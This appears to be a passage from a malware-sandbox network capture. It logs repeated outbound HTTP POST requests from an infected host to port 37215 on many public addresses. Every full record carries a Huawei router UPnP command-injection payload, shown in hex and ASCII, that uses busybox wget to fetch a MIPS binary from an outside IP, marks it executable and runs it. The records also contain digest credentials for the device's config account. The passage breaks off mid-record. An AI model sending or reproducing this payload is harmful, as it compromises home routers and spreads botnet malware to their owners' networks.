                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            286192.168.2.135707441.9.164.17737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.222372055 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            287192.168.2.1350042197.42.26.19037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.223242044 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            288192.168.2.1347094156.137.31.9037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.224097013 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            289192.168.2.1355062197.141.161.3037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.224996090 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            290192.168.2.1360486197.25.198.15537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.225873947 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            291192.168.2.1333888197.22.241.3637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.226767063 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            292192.168.2.135684641.31.222.7437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.227633953 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            293192.168.2.1354124197.100.180.10337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.228569984 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            294192.168.2.1352390156.192.233.18937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.229451895 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            295192.168.2.135332641.63.57.1637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.230283022 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 